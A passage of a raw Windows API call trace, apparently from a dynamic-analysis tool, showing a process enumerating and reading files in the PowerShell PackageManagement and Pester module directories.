lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0283.015] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0283.015] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0283.015] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0283.016] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0283.016] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0283.016] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0283.016] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0283.017] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0283.017] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0283.017] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0283.017] FindNextFileW (in: hFindFile=0x25b73cd25b0, lpFindFileData=0x653ef8c5f0 | out: lpFindFileData=0x653ef8c5f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0283.017] FindClose (in: hFindFile=0x25b73cd25b0 | out: hFindFile=0x25b73cd25b0) returned 1 [0283.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c850) returned 1 [0283.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c810) returned 1 [0283.018] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0283.018] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0283.018] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0283.018] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0283.018] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0283.018] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c610, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0283.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca60) returned 1 [0283.018] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cb40 | out: lpFileInformation=0x653ef8cb40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0283.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca20) returned 1 [0283.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cab0) returned 1 [0283.019] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x653ef8c590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0283.019] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\*"), lpFindFileData=0x653ef8c7c0 | out: lpFindFileData=0x653ef8c7c0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0283.019] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.019] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0283.019] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c780 | out: lpFindFileData=0x653ef8c780*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0283.020] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0283.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9e0) returned 1 [0283.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c9a0) returned 1 [0283.020] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0283.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8cad0) returned 1 [0283.020] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8cbb0 | out: lpFileInformation=0x653ef8cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0283.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8ca90) returned 1 [0283.020] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8c390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0283.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c870) returned 1 [0283.020] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x984 [0283.021] GetFileType (hFile=0x984) returned 0x1 [0283.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c7e0) returned 1 [0283.021] GetFileType (hFile=0x984) returned 0x1 [0283.021] ReadFile (in: hFile=0x984, lpBuffer=0x25b5c16a080, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c16a080*, lpNumberOfBytesRead=0x653ef8c948*=0x5f8, lpOverlapped=0x0) returned 1 [0283.021] ReadFile (in: hFile=0x984, lpBuffer=0x25b5c1695b8, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1695b8*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0283.021] ReadFile (in: hFile=0x984, lpBuffer=0x25b5c16a080, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8c948, lpOverlapped=0x0 | out: lpBuffer=0x25b5c16a080*, lpNumberOfBytesRead=0x653ef8c948*=0x0, lpOverlapped=0x0) returned 1 [0283.021] CloseHandle (hObject=0x984) returned 1 [0283.022] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0283.023] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0283.023] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0283.023] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0283.023] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0283.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0283.023] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0283.023] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0283.023] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.024] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0283.024] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0283.024] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0283.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0283.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0283.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8ca50) returned 1 [0283.024] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8c530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0283.024] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8c760 | out: lpFindFileData=0x653ef8c760*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2b50 [0283.025] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.025] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0283.025] FindNextFileW (in: hFindFile=0x25b73cd2b50, lpFindFileData=0x653ef8c720 | out: lpFindFileData=0x653ef8c720*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 0 [0283.025] FindClose (in: hFindFile=0x25b73cd2b50 | out: hFindFile=0x25b73cd2b50) returned 1 [0283.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c980) returned 1 [0283.025] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8c940) returned 1 [0283.025] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8c8c0) returned 1 [0283.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", nBufferLength=0x105, lpBuffer=0x653ef8c3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5", lpFilePart=0x0) returned 0x37 [0283.026] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\*"), lpFindFileData=0x653ef8c5d0 | out: lpFindFileData=0x653ef8c5d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2bb0 [0283.026] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0283.026] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bin", cAlternateFileName="")) returned 1 [0283.026] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2c1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="build.psake.ps1", cAlternateFileName="")) returned 1 [0283.026] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eff43a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4eff43a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4eff43a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2756, dwReserved0=0x0, dwReserved1=0x0, cFileName="CHANGELOG.md", cAlternateFileName="")) returned 1 [0283.027] FindNextFileW (in: hFindFile=0x25b73cd2bb0, lpFindFileData=0x653ef8c590 | out: lpFindFileData=0x653ef8c590*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, 